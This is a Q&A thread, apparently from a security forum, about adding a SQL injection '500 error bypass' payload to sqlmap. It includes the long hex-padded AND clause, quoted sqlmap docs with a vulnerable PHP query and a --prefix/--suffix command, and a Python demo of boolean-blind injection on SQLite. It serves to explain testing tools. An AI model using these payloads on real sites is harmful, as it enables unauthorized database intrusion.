
I had a valid injection, but could not exploit it due to 500 errors, so I looked around and found that R0b0t Pirates, a blog that specializes in tools like sqlmap, has put out a 500 error bypass, telling you to somehow add this to the query, with no information but a title:

+AND(SELECT 1)=(SELECT 0X41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+

My question is how you add this to the query. Do you add it as a prefix, a suffix, a regex?

Sanic Rider

1 Answer


The "Custom Injection Payload" section of the SQLMap Documentation explains how to add a bypass like this. It seems to me you would use --suffix followed by the AND clause you pasted above.

Here is the text from the docs:

Custom injection payload

Options: --prefix and --suffix

In some circumstances the vulnerable parameter is exploitable only if the user provides a specific suffix to be appended to the injection payload. Another scenario where these options come in handy presents itself when the user already knows the query syntax and wants to detect and exploit the SQL injection by directly providing an injection payload prefix and suffix.

Example of vulnerable source code:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";

To detect and exploit this SQL injection, you can either let sqlmap detect the boundaries (as in combination of SQL payload prefix and suffix) for you during the detection phase, or provide them on your own.

For example:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" \
-p id --prefix "')" --suffix "AND ('abc'='abc"
[...]

This will result in all sqlmap requests ending up in a query as follows:

$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";

Which makes the query syntactically correct.

In this simple example, sqlmap could detect the SQL injection and exploit it without the need to provide custom boundaries, but sometimes in real-world applications it is necessary to provide them, for instance when the injection point is within nested JOIN queries.

mcgyver5
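To make the prefix/suffix mechanics from the quoted docs concrete, here is an added example (not code from the question, the answer, or the sqlmap project). It reproduces the docs' vulnerable query shape (`id=('<input>')`) against an in-memory SQLite table with constructed sample rows, composes the parameter the way the docs describe (original value, then prefix, then payload, then suffix), and shows what happens with and without the boundaries. The table contents, the `probe`/`boolean_differential` helper names and the use of SQLite instead of MySQL are assumptions made for this example; the payloads `AND 1=1` / `AND 1=2` stand in for sqlmap's `<PAYLOAD>`.

```python
import sqlite3

# The vulnerable query from the sqlmap docs quoted above, in its PHP form:
#   $query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
# Modelled here as a Python format string (assumption: SQLite instead of MySQL).
TEMPLATE = "SELECT * FROM users WHERE id=('{id}') LIMIT 0, 1"

# The boundaries from the docs example: --prefix "')" --suffix "AND ('abc'='abc"
PREFIX = "')"
SUFFIX = "AND ('abc'='abc"

# Constructed sample data for the in-memory table (not from the page).
SAMPLE_ROWS = [(1, "alice"), (2, "bob")]


def build_parameter(value, payload, prefix="", suffix=""):
    """Compose the injected parameter value the way the docs describe:
    the original value, then the prefix, then the payload, then the suffix."""
    return f"{value}{prefix} {payload} {suffix}"


def build_query(param_value):
    """The application's own string concatenation (the quoted PHP line)."""
    return TEMPLATE.format(id=param_value)


def run_query(sql):
    """Run the composed query against a throwaway SQLite table.
    Returns the matched rows, or None if the query does not even parse
    (the analogue of the server throwing an error on a broken query)."""
    conn = sqlite3.connect(":memory:")
    try:
        conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
        conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_ROWS)
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None
    finally:
        conn.close()


def probe(payload, prefix=PREFIX, suffix=SUFFIX, value="1"):
    """Return (composed SQL, result rows or None) for one payload."""
    sql = build_query(build_parameter(value, payload, prefix, suffix))
    return sql, run_query(sql)


def boolean_differential(prefix, suffix, value="1"):
    """True if a true and a false payload give different results through
    these boundaries, i.e. the boolean-based blind injection is usable."""
    _, rows_true = probe("AND 1=1", prefix, suffix, value)
    _, rows_false = probe("AND 1=2", prefix, suffix, value)
    return (rows_true is not None and rows_false is not None
            and rows_true != rows_false)


if __name__ == "__main__":
    # With the docs' boundaries the query is syntactically correct and the
    # true/false payloads are distinguishable by the returned row.
    for payload in ("AND 1=1", "AND 1=2"):
        sql, rows = probe(payload)
        print(sql, "->", rows)
    # Without any boundaries the payload is swallowed inside the string
    # literal; with the prefix alone the closing ') is left dangling.
    print("no boundaries :", boolean_differential("", ""))
    print("prefix only   :", boolean_differential(PREFIX, ""))
    print("prefix+suffix :", boolean_differential(PREFIX, SUFFIX))
```

The prefix closes the application's own `('` and the suffix re-opens it so that the trailing `') LIMIT 0, 1` the application appends still parses; drop the suffix and the composed query is `... AND 1=1 ') LIMIT 0, 1`, which no SQL parser accepts. The clause from the question would be handed to sqlmap the same way, as the `--suffix` string; the `+` characters that surround it are how spaces are encoded in a URL query string, so they are not part of the SQL itself.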